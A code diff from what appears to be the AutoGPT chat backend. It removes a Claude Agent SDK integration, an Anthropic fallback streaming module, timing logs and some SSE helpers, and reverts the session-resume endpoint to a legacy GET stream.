# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
RUN apt-get update && apt-get install -y \
python3.13 \
python3-pip \
ffmpeg \
imagemagick \
jq \
ripgrep \
tree \
&& rm -rf /var/lib/apt/lists/*
# Copy only necessary files from builder

View File

@@ -27,11 +27,12 @@ class ChatConfig(BaseSettings):
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
# Streaming Configuration
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(
default=3,
description="Max retries for fallback path (SDK handles retries internally)",
max_context_messages: int = Field(
default=50, ge=1, le=200, description="Maximum context messages"
)
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(default=3, description="Maximum number of retries")
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
max_agent_schedules: int = Field(
default=30, description="Maximum number of agent schedules"
@@ -92,33 +93,6 @@ class ChatConfig(BaseSettings):
description="Name of the prompt in Langfuse to fetch",
)
# Claude Agent SDK Configuration
use_claude_agent_sdk: bool = Field(
default=True,
description="Use Claude Agent SDK for chat completions",
)
claude_agent_model: str | None = Field(
default=None,
description="Model for the Claude Agent SDK path. If None, derives from "
"the `model` field by stripping the OpenRouter provider prefix.",
)
claude_agent_max_budget_usd: float | None = Field(
default=None,
gt=0,
description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
)
claude_agent_max_buffer_size: int = Field(
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
"Increase if tool outputs exceed the limit.",
)
# Extended thinking configuration for Claude models
thinking_enabled: bool = Field(
default=True,
description="Enable adaptive thinking for Claude models via OpenRouter",
)
@field_validator("api_key", mode="before")
@classmethod
def get_api_key(cls, v):
@@ -158,17 +132,6 @@ class ChatConfig(BaseSettings):
v = os.getenv("CHAT_INTERNAL_API_KEY")
return v
@field_validator("use_claude_agent_sdk", mode="before")
@classmethod
def get_use_claude_agent_sdk(cls, v):
"""Get use_claude_agent_sdk from environment if not provided."""
# Check environment variable - default to True if not set
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
if env_val:
return env_val in ("true", "1", "yes", "on")
# Default to True (SDK enabled by default)
return True if v is None else v
# Prompt paths for different contexts
PROMPT_PATHS: dict[str, str] = {
"default": "prompts/chat_system.md",

View File

@@ -45,7 +45,10 @@ async def create_chat_session(
successfulAgentRuns=SafeJson({}),
successfulAgentSchedules=SafeJson({}),
)
return await PrismaChatSession.prisma().create(data=data)
return await PrismaChatSession.prisma().create(
data=data,
include={"Messages": True},
)
async def update_chat_session(

View File

@@ -273,8 +273,9 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
try:
session = ChatSession.model_validate_json(raw_session)
logger.info(
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
f"Loading session {session_id} from cache: "
f"message_count={len(session.messages)}, "
f"roles={[m.role for m in session.messages]}"
)
return session
except Exception as e:
@@ -316,9 +317,11 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
return None
messages = prisma_session.Messages
logger.debug(
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
logger.info(
f"Loading session {session_id} from DB: "
f"has_messages={messages is not None}, "
f"message_count={len(messages) if messages else 0}, "
f"roles={[m.role for m in messages] if messages else []}"
)
return ChatSession.from_db(prisma_session, messages)
@@ -369,9 +372,10 @@ async def _save_session_to_db(
"function_call": msg.function_call,
}
)
logger.debug(
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
f"roles={[m['role'] for m in messages_data]}"
logger.info(
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
f"roles={[m['role'] for m in messages_data]}, "
f"start_sequence={existing_message_count}"
)
await chat_db.add_chat_messages_batch(
session_id=session.session_id,
@@ -411,7 +415,7 @@ async def get_chat_session(
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
# Fall back to database
logger.debug(f"Session {session_id} not in cache, checking database")
logger.info(f"Session {session_id} not in cache, checking database")
session = await _get_session_from_db(session_id)
if session is None:
@@ -428,6 +432,7 @@ async def get_chat_session(
# Cache the session from DB
try:
await _cache_session(session)
logger.info(f"Cached session {session_id} from database")
except Exception as e:
logger.warning(f"Failed to cache session {session_id}: {e}")
@@ -492,40 +497,6 @@ async def upsert_chat_session(
return session
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
"""Atomically append a message to a session and persist it.
Acquires the session lock, re-fetches the latest session state,
appends the message, and saves — preventing message loss when
concurrent requests modify the same session.
"""
lock = await _get_session_lock(session_id)
async with lock:
session = await get_chat_session(session_id)
if session is None:
raise ValueError(f"Session {session_id} not found")
session.messages.append(message)
existing_message_count = await chat_db.get_chat_session_message_count(
session_id
)
try:
await _save_session_to_db(session, existing_message_count)
except Exception as e:
raise DatabaseError(
f"Failed to persist message to session {session_id}"
) from e
try:
await _cache_session(session)
except Exception as e:
logger.warning(f"Cache write failed for session {session_id}: {e}")
return session
async def create_chat_session(user_id: str) -> ChatSession:
"""Create a new chat session and persist it.
@@ -632,19 +603,13 @@ async def update_session_title(session_id: str, title: str) -> bool:
logger.warning(f"Session {session_id} not found for title update")
return False
# Update title in cache if it exists (instead of invalidating).
# This prevents race conditions where cache invalidation causes
# the frontend to see stale DB data while streaming is still in progress.
# Invalidate cache so next fetch gets updated title
try:
cached = await _get_session_from_cache(session_id)
if cached:
cached.title = title
await _cache_session(cached)
redis_key = _get_session_cache_key(session_id)
async_redis = await get_redis_async()
await async_redis.delete(redis_key)
except Exception as e:
# Not critical - title will be correct on next full cache refresh
logger.warning(
f"Failed to update title in cache for session {session_id}: {e}"
)
logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
return True
except Exception as e:

View File

@@ -10,8 +10,6 @@ from typing import Any
from pydantic import BaseModel, Field
from backend.util.json import dumps as json_dumps
class ResponseType(str, Enum):
"""Types of streaming responses following AI SDK protocol."""
@@ -20,10 +18,6 @@ class ResponseType(str, Enum):
START = "start"
FINISH = "finish"
# Step lifecycle (one LLM API call within a message)
START_STEP = "start-step"
FINISH_STEP = "finish-step"
# Text streaming
TEXT_START = "text-start"
TEXT_DELTA = "text-delta"
@@ -63,16 +57,6 @@ class StreamStart(StreamBaseResponse):
description="Task ID for SSE reconnection. Clients can reconnect using GET /tasks/{taskId}/stream",
)
def to_sse(self) -> str:
"""Convert to SSE format, excluding non-protocol fields like taskId."""
import json
data: dict[str, Any] = {
"type": self.type.value,
"messageId": self.messageId,
}
return f"data: {json.dumps(data)}\n\n"
class StreamFinish(StreamBaseResponse):
"""End of message/stream."""
@@ -80,26 +64,6 @@ class StreamFinish(StreamBaseResponse):
type: ResponseType = ResponseType.FINISH
class StreamStartStep(StreamBaseResponse):
"""Start of a step (one LLM API call within a message).
The AI SDK uses this to add a step-start boundary to message.parts,
enabling visual separation between multiple LLM calls in a single message.
"""
type: ResponseType = ResponseType.START_STEP
class StreamFinishStep(StreamBaseResponse):
"""End of a step (one LLM API call within a message).
The AI SDK uses this to reset activeTextParts and activeReasoningParts,
so the next LLM call in a tool-call continuation starts with clean state.
"""
type: ResponseType = ResponseType.FINISH_STEP
# ========== Text Streaming ==========
@@ -153,7 +117,7 @@ class StreamToolOutputAvailable(StreamBaseResponse):
type: ResponseType = ResponseType.TOOL_OUTPUT_AVAILABLE
toolCallId: str = Field(..., description="Tool call ID this responds to")
output: str | dict[str, Any] = Field(..., description="Tool execution output")
# Keep these for internal backend use
# Additional fields for internal use (not part of AI SDK spec but useful)
toolName: str | None = Field(
default=None, description="Name of the tool that was executed"
)
@@ -161,17 +125,6 @@ class StreamToolOutputAvailable(StreamBaseResponse):
default=True, description="Whether the tool execution succeeded"
)
def to_sse(self) -> str:
"""Convert to SSE format, excluding non-spec fields."""
import json
data = {
"type": self.type.value,
"toolCallId": self.toolCallId,
"output": self.output,
}
return f"data: {json.dumps(data)}\n\n"
# ========== Other ==========
@@ -195,18 +148,6 @@ class StreamError(StreamBaseResponse):
default=None, description="Additional error details"
)
def to_sse(self) -> str:
"""Convert to SSE format, only emitting fields required by AI SDK protocol.
The AI SDK uses z.strictObject({type, errorText}) which rejects
any extra fields like `code` or `details`.
"""
data = {
"type": self.type.value,
"errorText": self.errorText,
}
return f"data: {json_dumps(data)}\n\n"
class StreamHeartbeat(StreamBaseResponse):
"""Heartbeat to keep SSE connection alive during long-running operations.

View File

@@ -1,13 +1,12 @@
"""Chat API routes for chat session management and streaming via SSE."""
import asyncio
import logging
import uuid as uuid_module
from collections.abc import AsyncGenerator
from typing import Annotated
from autogpt_libs import auth
from fastapi import APIRouter, Depends, Header, HTTPException, Query, Response, Security
from fastapi import APIRouter, Depends, Header, HTTPException, Query, Security
from fastapi.responses import StreamingResponse
from pydantic import BaseModel
@@ -17,39 +16,8 @@ from . import service as chat_service
from . import stream_registry
from .completion_handler import process_operation_failure, process_operation_success
from .config import ChatConfig
from .model import (
ChatMessage,
ChatSession,
append_and_save_message,
create_chat_session,
get_chat_session,
get_user_sessions,
)
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
from .sdk import service as sdk_service
from .tools.models import (
AgentDetailsResponse,
AgentOutputResponse,
AgentPreviewResponse,
AgentSavedResponse,
AgentsFoundResponse,
BlockListResponse,
BlockOutputResponse,
ClarificationNeededResponse,
DocPageResponse,
DocSearchResultsResponse,
ErrorResponse,
ExecutionStartedResponse,
InputValidationErrorResponse,
NeedLoginResponse,
NoResultsResponse,
OperationInProgressResponse,
OperationPendingResponse,
OperationStartedResponse,
SetupRequirementsResponse,
UnderstandingUpdatedResponse,
)
from .tracking import track_user_message
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
from .response_model import StreamFinish, StreamHeartbeat, StreamStart
config = ChatConfig()
@@ -241,10 +209,6 @@ async def get_session(
active_task, last_message_id = await stream_registry.get_active_task_for_session(
session_id, user_id
)
logger.info(
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
)
if active_task:
# Filter out the in-progress assistant message from the session response.
# The client will receive the complete assistant response through the SSE
@@ -302,54 +266,12 @@ async def stream_chat_post(
"""
import asyncio
import time
stream_start_time = time.perf_counter()
log_meta = {"component": "ChatStream", "session_id": session_id}
if user_id:
log_meta["user_id"] = user_id
logger.info(
f"[TIMING] stream_chat_post STARTED, session={session_id}, "
f"user={user_id}, message_len={len(request.message)}",
extra={"json_fields": log_meta},
)
session = await _validate_and_get_session(session_id, user_id)
logger.info(
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"duration_ms": (time.perf_counter() - stream_start_time) * 1000,
}
},
)
# Atomically append user message to session BEFORE creating task to avoid
# race condition where GET_SESSION sees task as "running" but message isn't
# saved yet. append_and_save_message re-fetches inside a lock to prevent
# message loss from concurrent requests.
if request.message:
message = ChatMessage(
role="user" if request.is_user_message else "assistant",
content=request.message,
)
if request.is_user_message:
track_user_message(
user_id=user_id,
session_id=session_id,
message_length=len(request.message),
)
logger.info(f"[STREAM] Saving user message to session {session_id}")
session = await append_and_save_message(session_id, message)
logger.info(f"[STREAM] User message saved for session {session_id}")
# Create a task in the stream registry for reconnection support
task_id = str(uuid_module.uuid4())
operation_id = str(uuid_module.uuid4())
log_meta["task_id"] = task_id
task_create_start = time.perf_counter()
await stream_registry.create_task(
task_id=task_id,
session_id=session_id,
@@ -358,147 +280,40 @@ async def stream_chat_post(
tool_name="chat",
operation_id=operation_id,
)
logger.info(
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"duration_ms": (time.perf_counter() - task_create_start) * 1000,
}
},
)
# Background task that runs the AI generation independently of SSE connection
async def run_ai_generation():
import time as time_module
gen_start_time = time_module.perf_counter()
logger.info(
f"[TIMING] run_ai_generation STARTED, task={task_id}, session={session_id}, user={user_id}",
extra={"json_fields": log_meta},
)
first_chunk_time, ttfc = None, None
chunk_count = 0
try:
# Emit a start event with task_id for reconnection
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
await stream_registry.publish_chunk(task_id, start_chunk)
logger.info(
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
* 1000,
}
},
)
# Choose service based on configuration
use_sdk = config.use_claude_agent_sdk
stream_fn = (
sdk_service.stream_chat_completion_sdk
if use_sdk
else chat_service.stream_chat_completion
)
logger.info(
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
extra={"json_fields": log_meta},
)
# Pass message=None since we already added it to the session above
async for chunk in stream_fn(
async for chunk in chat_service.stream_chat_completion(
session_id,
None, # Message already in session
request.message,
is_user_message=request.is_user_message,
user_id=user_id,
session=session, # Pass session with message already added
session=session, # Pass pre-fetched session to avoid double-fetch
context=request.context,
):
# Skip duplicate StreamStart — we already published one above
if isinstance(chunk, StreamStart):
continue
chunk_count += 1
if first_chunk_time is None:
first_chunk_time = time_module.perf_counter()
ttfc = first_chunk_time - gen_start_time
logger.info(
f"[TIMING] FIRST AI CHUNK at {ttfc:.2f}s, type={type(chunk).__name__}",
extra={
"json_fields": {
**log_meta,
"chunk_type": type(chunk).__name__,
"time_to_first_chunk_ms": ttfc * 1000,
}
},
)
# Write to Redis (subscribers will receive via XREAD)
await stream_registry.publish_chunk(task_id, chunk)
gen_end_time = time_module.perf_counter()
total_time = (gen_end_time - gen_start_time) * 1000
logger.info(
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
f"task={task_id}, session={session_id}, "
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
extra={
"json_fields": {
**log_meta,
"total_time_ms": total_time,
"time_to_first_chunk_ms": (
ttfc * 1000 if ttfc is not None else None
),
"n_chunks": chunk_count,
}
},
)
# Mark task as completed
await stream_registry.mark_task_completed(task_id, "completed")
except Exception as e:
elapsed = time_module.perf_counter() - gen_start_time
logger.error(
f"[TIMING] run_ai_generation ERROR after {elapsed:.2f}s: {e}",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": elapsed * 1000,
"error": str(e),
}
},
f"Error in background AI generation for session {session_id}: {e}"
)
# Publish a StreamError so the frontend can display an error message
try:
await stream_registry.publish_chunk(
task_id,
StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
),
)
except Exception:
pass # Best-effort; mark_task_completed will publish StreamFinish
await stream_registry.mark_task_completed(task_id, "failed")
# Start the AI generation in a background task
bg_task = asyncio.create_task(run_ai_generation())
await stream_registry.set_task_asyncio_task(task_id, bg_task)
setup_time = (time.perf_counter() - stream_start_time) * 1000
logger.info(
f"[TIMING] Background task started, setup={setup_time:.1f}ms",
extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
)
# SSE endpoint that subscribes to the task's stream
async def event_generator() -> AsyncGenerator[str, None]:
import time as time_module
event_gen_start = time_module.perf_counter()
logger.info(
f"[TIMING] event_generator STARTED, task={task_id}, session={session_id}, "
f"user={user_id}",
extra={"json_fields": log_meta},
)
subscriber_queue = None
first_chunk_yielded = False
chunks_yielded = 0
try:
# Subscribe to the task stream (this replays existing messages + live updates)
subscriber_queue = await stream_registry.subscribe_to_task(
@@ -513,78 +328,24 @@ async def stream_chat_post(
return
# Read from the subscriber queue and yield to SSE
logger.info(
"[TIMING] Starting to read from subscriber_queue",
extra={"json_fields": log_meta},
)
while True:
try:
chunk = await asyncio.wait_for(subscriber_queue.get(), timeout=30.0)
chunks_yielded += 1
if not first_chunk_yielded:
first_chunk_yielded = True
elapsed = time_module.perf_counter() - event_gen_start
logger.info(
f"[TIMING] FIRST CHUNK from queue at {elapsed:.2f}s, "
f"type={type(chunk).__name__}",
extra={
"json_fields": {
**log_meta,
"chunk_type": type(chunk).__name__,
"elapsed_ms": elapsed * 1000,
}
},
)
yield chunk.to_sse()
# Check for finish signal
if isinstance(chunk, StreamFinish):
total_time = time_module.perf_counter() - event_gen_start
logger.info(
f"[TIMING] StreamFinish received in {total_time:.2f}s; "
f"n_chunks={chunks_yielded}",
extra={
"json_fields": {
**log_meta,
"chunks_yielded": chunks_yielded,
"total_time_ms": total_time * 1000,
}
},
)
break
except asyncio.TimeoutError:
# Send heartbeat to keep connection alive
yield StreamHeartbeat().to_sse()
except GeneratorExit:
logger.info(
f"[TIMING] GeneratorExit (client disconnected), chunks={chunks_yielded}",
extra={
"json_fields": {
**log_meta,
"chunks_yielded": chunks_yielded,
"reason": "client_disconnect",
}
},
)
pass # Client disconnected - background task continues
except Exception as e:
elapsed = (time_module.perf_counter() - event_gen_start) * 1000
logger.error(
f"[TIMING] event_generator ERROR after {elapsed:.1f}ms: {e}",
extra={
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
},
)
# Surface error to frontend so it doesn't appear stuck
yield StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
).to_sse()
yield StreamFinish().to_sse()
logger.error(f"Error in SSE stream for task {task_id}: {e}")
finally:
# Unsubscribe when client disconnects or stream ends
# Unsubscribe when client disconnects or stream ends to prevent resource leak
if subscriber_queue is not None:
try:
await stream_registry.unsubscribe_from_task(
@@ -596,18 +357,6 @@ async def stream_chat_post(
exc_info=True,
)
# AI SDK protocol termination - always yield even if unsubscribe fails
total_time = time_module.perf_counter() - event_gen_start
logger.info(
f"[TIMING] event_generator FINISHED in {total_time:.2f}s; "
f"task={task_id}, session={session_id}, n_chunks={chunks_yielded}",
extra={
"json_fields": {
**log_meta,
"total_time_ms": total_time * 1000,
"chunks_yielded": chunks_yielded,
}
},
)
yield "data: [DONE]\n\n"
return StreamingResponse(
@@ -625,90 +374,63 @@ async def stream_chat_post(
@router.get(
"/sessions/{session_id}/stream",
)
async def resume_session_stream(
async def stream_chat_get(
session_id: str,
message: Annotated[str, Query(min_length=1, max_length=10000)],
user_id: str | None = Depends(auth.get_user_id),
is_user_message: bool = Query(default=True),
):
"""
Resume an active stream for a session.
Stream chat responses for a session (GET - legacy endpoint).
Called by the AI SDK's ``useChat(resume: true)`` on page load.
Checks for an active (in-progress) task on the session and either replays
the full SSE stream or returns 204 No Content if nothing is running.
Streams the AI/completion responses in real time over Server-Sent Events (SSE), including:
- Text fragments as they are generated
- Tool call UI elements (if invoked)
- Tool execution results
Args:
session_id: The chat session identifier.
session_id: The chat session identifier to associate with the streamed messages.
message: The user's new message to process.
user_id: Optional authenticated user ID.
is_user_message: Whether the message is a user message.
Returns:
StreamingResponse (SSE) when an active stream exists,
or 204 No Content when there is nothing to resume.
StreamingResponse: SSE-formatted response chunks.
"""
import asyncio
active_task, _last_id = await stream_registry.get_active_task_for_session(
session_id, user_id
)
if not active_task:
return Response(status_code=204)
subscriber_queue = await stream_registry.subscribe_to_task(
task_id=active_task.task_id,
user_id=user_id,
last_message_id="0-0", # Full replay so useChat rebuilds the message
)
if subscriber_queue is None:
return Response(status_code=204)
session = await _validate_and_get_session(session_id, user_id)
async def event_generator() -> AsyncGenerator[str, None]:
chunk_count = 0
first_chunk_type: str | None = None
try:
while True:
try:
chunk = await asyncio.wait_for(subscriber_queue.get(), timeout=30.0)
if chunk_count < 3:
logger.info(
"Resume stream chunk",
extra={
"session_id": session_id,
"chunk_type": str(chunk.type),
},
)
if not first_chunk_type:
first_chunk_type = str(chunk.type)
chunk_count += 1
yield chunk.to_sse()
if isinstance(chunk, StreamFinish):
break
except asyncio.TimeoutError:
yield StreamHeartbeat().to_sse()
except GeneratorExit:
pass
except Exception as e:
logger.error(f"Error in resume stream for session {session_id}: {e}")
finally:
try:
await stream_registry.unsubscribe_from_task(
active_task.task_id, subscriber_queue
async for chunk in chat_service.stream_chat_completion(
session_id,
message,
is_user_message=is_user_message,
user_id=user_id,
session=session, # Pass pre-fetched session to avoid double-fetch
):
if chunk_count < 3:
logger.info(
"Chat stream chunk",
extra={
"session_id": session_id,
"chunk_type": str(chunk.type),
},
)
except Exception as unsub_err:
logger.error(
f"Error unsubscribing from task {active_task.task_id}: {unsub_err}",
exc_info=True,
)
logger.info(
"Resume stream completed",
extra={
"session_id": session_id,
"n_chunks": chunk_count,
"first_chunk_type": first_chunk_type,
},
)
yield "data: [DONE]\n\n"
if not first_chunk_type:
first_chunk_type = str(chunk.type)
chunk_count += 1
yield chunk.to_sse()
logger.info(
"Chat stream completed",
extra={
"session_id": session_id,
"chunk_count": chunk_count,
"first_chunk_type": first_chunk_type,
},
)
# AI SDK protocol termination
yield "data: [DONE]\n\n"
return StreamingResponse(
event_generator(),
@@ -716,8 +438,8 @@ async def resume_session_stream(
headers={
"Cache-Control": "no-cache",
"Connection": "keep-alive",
"X-Accel-Buffering": "no",
"x-vercel-ai-ui-message-stream": "v1",
"X-Accel-Buffering": "no", # Disable nginx buffering
"x-vercel-ai-ui-message-stream": "v1", # AI SDK protocol header
},
)
@@ -828,6 +550,8 @@ async def stream_task(
)
async def event_generator() -> AsyncGenerator[str, None]:
import asyncio
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
try:
while True:
@@ -1027,42 +751,3 @@ async def health_check() -> dict:
"service": "chat",
"version": "0.1.0",
}
# ========== Schema Export (for OpenAPI / Orval codegen) ==========
ToolResponseUnion = (
AgentsFoundResponse
| NoResultsResponse
| AgentDetailsResponse
| SetupRequirementsResponse
| ExecutionStartedResponse
| NeedLoginResponse
| ErrorResponse
| InputValidationErrorResponse
| AgentOutputResponse
| UnderstandingUpdatedResponse
| AgentPreviewResponse
| AgentSavedResponse
| ClarificationNeededResponse
| BlockListResponse
| BlockOutputResponse
| DocSearchResultsResponse
| DocPageResponse
| OperationStartedResponse
| OperationPendingResponse
| OperationInProgressResponse
)
@router.get(
"/schema/tool-responses",
response_model=ToolResponseUnion,
include_in_schema=True,
summary="[Dummy] Tool response type export for codegen",
description="This endpoint is not meant to be called. It exists solely to "
"expose tool response models in the OpenAPI schema for frontend codegen.",
)
async def _tool_response_schema() -> ToolResponseUnion: # type: ignore[return]
"""Never called at runtime. Exists only so Orval generates TS types."""
raise HTTPException(status_code=501, detail="Schema-only endpoint")

View File

@@ -1,14 +0,0 @@
"""Claude Agent SDK integration for CoPilot.
This module provides the integration layer between the Claude Agent SDK
and the existing CoPilot tool system, enabling drop-in replacement of
the current LLM orchestration with the battle-tested Claude Agent SDK.
"""
from .service import stream_chat_completion_sdk
from .tool_adapter import create_copilot_mcp_server
__all__ = [
"stream_chat_completion_sdk",
"create_copilot_mcp_server",
]

View File

@@ -1,363 +0,0 @@
"""Anthropic SDK fallback implementation.
This module provides the fallback streaming implementation using the Anthropic SDK
directly when the Claude Agent SDK is not available.
"""
import json
import logging
import uuid
from collections.abc import AsyncGenerator
from typing import Any, cast
from ..config import ChatConfig
from ..model import ChatMessage, ChatSession
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from .tool_adapter import get_tool_definitions, get_tool_handlers
logger = logging.getLogger(__name__)
config = ChatConfig()
# Maximum tool-call iterations before stopping to prevent infinite loops
_MAX_TOOL_ITERATIONS = 10
async def stream_with_anthropic(
session: ChatSession,
system_prompt: str,
text_block_id: str,
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream using Anthropic SDK directly with tool calling support.
This function accumulates messages into the session for persistence.
The caller should NOT yield an additional StreamFinish - this function handles it.
"""
import anthropic
# Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
# with config.base_url for OpenRouter routing — matching the non-SDK path.
api_key = config.api_key
if not api_key:
yield StreamError(
errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
code="config_error",
)
yield StreamFinish()
return
# Build kwargs for the Anthropic client — use base_url if configured
client_kwargs: dict[str, Any] = {"api_key": api_key}
if config.base_url:
# Strip /v1 suffix — Anthropic SDK adds its own version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
client_kwargs["base_url"] = base
client = anthropic.AsyncAnthropic(**client_kwargs)
tool_definitions = get_tool_definitions()
tool_handlers = get_tool_handlers()
anthropic_tools = [
{
"name": t["name"],
"description": t["description"],
"input_schema": t["inputSchema"],
}
for t in tool_definitions
]
anthropic_messages = _convert_session_to_anthropic(session)
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
anthropic_messages.append(
{"role": "user", "content": "Continue with the task."}
)
has_started_text = False
accumulated_text = ""
accumulated_tool_calls: list[dict[str, Any]] = []
for _ in range(_MAX_TOOL_ITERATIONS):
try:
async with client.messages.stream(
model=(
config.model.split("/")[-1] if "/" in config.model else config.model
),
max_tokens=4096,
system=system_prompt,
messages=cast(Any, anthropic_messages),
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
) as stream:
async for event in stream:
if event.type == "content_block_start":
block = event.content_block
if hasattr(block, "type"):
if block.type == "text" and not has_started_text:
yield StreamTextStart(id=text_block_id)
has_started_text = True
elif block.type == "tool_use":
yield StreamToolInputStart(
toolCallId=block.id, toolName=block.name
)
elif event.type == "content_block_delta":
delta = event.delta
if hasattr(delta, "type") and delta.type == "text_delta":
accumulated_text += delta.text
yield StreamTextDelta(id=text_block_id, delta=delta.text)
final_message = await stream.get_final_message()
if final_message.stop_reason == "tool_use":
if has_started_text:
yield StreamTextEnd(id=text_block_id)
has_started_text = False
text_block_id = str(uuid.uuid4())
tool_results = []
assistant_content: list[dict[str, Any]] = []
for block in final_message.content:
if block.type == "text":
assistant_content.append(
{"type": "text", "text": block.text}
)
elif block.type == "tool_use":
assistant_content.append(
{
"type": "tool_use",
"id": block.id,
"name": block.name,
"input": block.input,
}
)
# Track tool call for session persistence
accumulated_tool_calls.append(
{
"id": block.id,
"type": "function",
"function": {
"name": block.name,
"arguments": json.dumps(
block.input
if isinstance(block.input, dict)
else {}
),
},
}
)
yield StreamToolInputAvailable(
toolCallId=block.id,
toolName=block.name,
input=(
block.input if isinstance(block.input, dict) else {}
),
)
output, is_error = await _execute_tool(
block.name, block.input, tool_handlers
)
yield StreamToolOutputAvailable(
toolCallId=block.id,
toolName=block.name,
output=output,
success=not is_error,
)
# Save tool result to session
session.messages.append(
ChatMessage(
role="tool",
content=output,
tool_call_id=block.id,
)
)
tool_results.append(
{
"type": "tool_result",
"tool_use_id": block.id,
"content": output,
"is_error": is_error,
}
)
# Save assistant message with tool calls to session
session.messages.append(
ChatMessage(
role="assistant",
content=accumulated_text or None,
tool_calls=(
accumulated_tool_calls
if accumulated_tool_calls
else None
),
)
)
# Reset for next iteration
accumulated_text = ""
accumulated_tool_calls = []
anthropic_messages.append(
{"role": "assistant", "content": assistant_content}
)
anthropic_messages.append({"role": "user", "content": tool_results})
continue
else:
if has_started_text:
yield StreamTextEnd(id=text_block_id)
# Save final assistant response to session
if accumulated_text:
session.messages.append(
ChatMessage(role="assistant", content=accumulated_text)
)
yield StreamUsage(
promptTokens=final_message.usage.input_tokens,
completionTokens=final_message.usage.output_tokens,
totalTokens=final_message.usage.input_tokens
+ final_message.usage.output_tokens,
)
yield StreamFinish()
return
except Exception as e:
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
yield StreamError(
errorText="An error occurred. Please try again.",
code="anthropic_error",
)
yield StreamFinish()
return
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
yield StreamFinish()
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
"""Convert session messages to Anthropic format.
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
"""
messages: list[dict[str, Any]] = []
for msg in session.messages:
if msg.role == "user":
new_msg = {"role": "user", "content": msg.content or ""}
elif msg.role == "assistant":
content: list[dict[str, Any]] = []
if msg.content:
content.append({"type": "text", "text": msg.content})
if msg.tool_calls:
for tc in msg.tool_calls:
func = tc.get("function", {})
args = func.get("arguments", {})
if isinstance(args, str):
try:
args = json.loads(args)
except json.JSONDecodeError:
args = {}
content.append(
{
"type": "tool_use",
"id": tc.get("id", str(uuid.uuid4())),
"name": func.get("name", ""),
"input": args,
}
)
if content:
new_msg = {"role": "assistant", "content": content}
else:
continue # Skip empty assistant messages
elif msg.role == "tool":
new_msg = {
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": msg.tool_call_id or "",
"content": msg.content or "",
}
],
}
else:
continue
messages.append(new_msg)
# Merge consecutive same-role messages (Anthropic requires alternating roles)
return _merge_consecutive_roles(messages)
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
"""Merge consecutive messages with the same role.
Anthropic API requires alternating user/assistant roles.
"""
if not messages:
return []
merged: list[dict[str, Any]] = []
for msg in messages:
if merged and merged[-1]["role"] == msg["role"]:
# Merge with previous message
prev_content = merged[-1]["content"]
new_content = msg["content"]
# Normalize both to list-of-blocks form
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(new_content, str):
new_content = [{"type": "text", "text": new_content}]
# Ensure both are lists
if not isinstance(prev_content, list):
prev_content = [prev_content]
if not isinstance(new_content, list):
new_content = [new_content]
merged[-1]["content"] = prev_content + new_content
else:
merged.append(msg)
return merged
async def _execute_tool(
tool_name: str, tool_input: Any, handlers: dict[str, Any]
) -> tuple[str, bool]:
"""Execute a tool and return (output, is_error)."""
handler = handlers.get(tool_name)
if not handler:
return f"Unknown tool: {tool_name}", True
try:
result = await handler(tool_input)
# Safely extract output - handle empty or missing content
content = result.get("content") or []
